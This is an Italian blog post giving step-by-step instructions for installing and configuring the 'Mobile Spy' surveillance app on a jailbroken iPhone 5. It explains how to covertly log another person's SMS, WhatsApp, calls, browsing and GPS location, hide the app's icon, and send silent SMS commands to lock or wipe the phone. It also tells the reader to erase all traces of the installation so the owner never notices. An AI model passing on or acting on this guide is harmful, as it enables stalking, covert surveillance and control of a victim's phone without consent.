Skip to Content

Spiare iPhone 5

Spiare iPhone 5

Sii il Primo!
da febbraio 7, 2013 iPhone

Ci sono in rete diverse applicazioni che una volta installate sul proprio cellulare consentono di monitorare e spiare tutto quello che avviene… però pochi di essi sono compatibili con il nuovo iPhone 5 e iOS 6.x

Una delle applicazioni “spia” compatibili con iPhone 5 si chiama Mobile Spy ed è scaricabile su http://www.cellulare-spia.com

Questa applicazione una volta scaricate e installata su iPhone 5 (che deve essere jailbreak…) consente (in modo invisibile) di tracciare tutti gli sms, attività su web, su whatsapp, chiamate effettuate e ricevute.. e infine invia tutti questi dati tramite una connessione internet (via Wi-fi o tramite connessione del dispositivo se questo ha attivo un piano dati) ad un pannello di controllo da cui poi e’ possibile vedere tutto.

Per installare MobileSpy sul tuo iPhone 5 segui attentamente questa GUIDA

Una volta installato bisogna configurare l’applicazione in modo da tracciare e spiare quello che si desidera. Ecco come configurare Mobile Spy:

1. Chiama e digita *12345  per aprire l’applicazione nascosta

iphone spia

2. Adesso l’icona per accedere a Mobile Spy sarà visibile sotto la voce Smartphone

*** NOTA: Su iPhone 4G il telefono si comporterà come se stesse facendo una vera chiamata dopo che digiti *12345 . Questo non è un errore, attendi la fine della chiamata e poi il telefono mostrerà l’icona “Smartphone”. Clicca sull’icona Smartphone.

3. Adesso apparirà l’interfaccia del programma. Usa tuo username / password che hai creato per accedere a Mobile Spy.

image

La prima finestra che ti apparirà non appena loggato sarà questa:

image

Il programma ti chiederà se vuoi attivare il monitoraggio della tua posizione. Se premi OK si attiverà la funzione (è necessario pero’ che il tuo iPhone abbia il GPS attivo)

4. Adesso puoi configurare Mobile Spy perchè potrai scegliere cosa tracciare e registrare. Devi semplicemente impostare su On quello che vuoi che venga tracciato.

image

5. In basso seleziona Location per poi impostare e attivare la funzione di tracciamento GPS.

image

6. Infine vai nella sezione Security da cui potrai modificare il numero da chiamare per aprire il programma (“Access Code”). Qui puoi anche decidere di impostare “Hide Icon” per nascondere l’icona del programma.

** Si consiglia di impostare su “On” le voci in questa schermata per assicurare l’invisibilità del software. **

image

 

7. Poi vai nella sezione Recovery. In questa schermata potrai inserire il tuo numero di telefono in modo tale da essere avvisato (da remoto) se per caso viene cambiata la scheda SIM del telefono spiato. Riceverai un SMS che ti avvisa che è stata cambiata la SIM.Potrai anche decidere quali comandi via SMS vuoi attivare e disattivare. Clicca suON per attivarli. Infine clicca su Save per salvare le modifiche.

image

Comandi via SMS:

*12345 lock – Blocca l’uso del telefono da remoto.

*12345 unlock – Sblocca il telefono da remoto.

*12345 gps – Recupera le informazioni GPS per sapere esattamente dove si trova il cellulare. Sul tuo cellulare riceverai un SMS che contiene la posizione e un link con la mappa precisa.

*12345 siminfo – Recupera informazioni sulla SIM inserita nel telefono. Riceverai un SMS con tutte queste informazioni.

*12345 wipe – Cancella da remoto tutti gli SMS presenti sul iphone, le pagine navigate, i contatti memorizzati, le foto, ecc….

NB: Inviando questo comandi, il telefono monitorato non riceverà nessun SMS, quindi nessuno si accorgerà che state effettuando operazioni su di esso.

NOTA: Ovviamente se cambi il codice di accesso *12345 con un altro numero, includi il * all’inizio del numero e anche i comandi SMS sopra scritti cambieranno numero.

8. Infine clicca su Email Alerts. Da questa sezione potrai decidere di ricevere i log e tracciamenti direttamente via email. La funzione LIVE SETTINGS potrai attivarla solo se hai acquistato il servizio LIVE CONTROL PANEL (servizio che consente di vedere in tempo reale quello che accade sul dispositivo tramite delle foto che vengono inviate alla tua casella email)

Per attivare invece le notifiche via Email dovrai mettere nel campo Email ID la tua mail e l’intervallo di tempo fra una mail e la successiva. Poi scegli i tipi di informazioni che vuoi ricevere. Scegliendo ON attivi quel tracciamento. Clicca su Save per salvare le modifiche.

NOTA: La prima volta che accedi a tale sezione clicca su Activate per attivare l’invio via mail dal tuo account Mobile Spy.

image

9. Una volta configurato Mobile Spy clicca sul bottone Home per ritornare alla schermata iniziale. Entro 4-8 secondi, la schermata di resetterà e vedrai la  vista originale, non nascosta sia l’icona di Cydia che quella “Smartphone”. Adesso Mobile Spy è pronto per monitorare!

*** Dopo l’installazione assicurati di cancellare le chiamate fatte e di rimuovere ogni traccia dell’installazione di Mobile SPY sul tuo iPhone.

Precedente
Successivo

Lascia un Commento o Rispondi

La tua email non sarà visibile pubblicamente.Campi obbligatori sono marcati *

*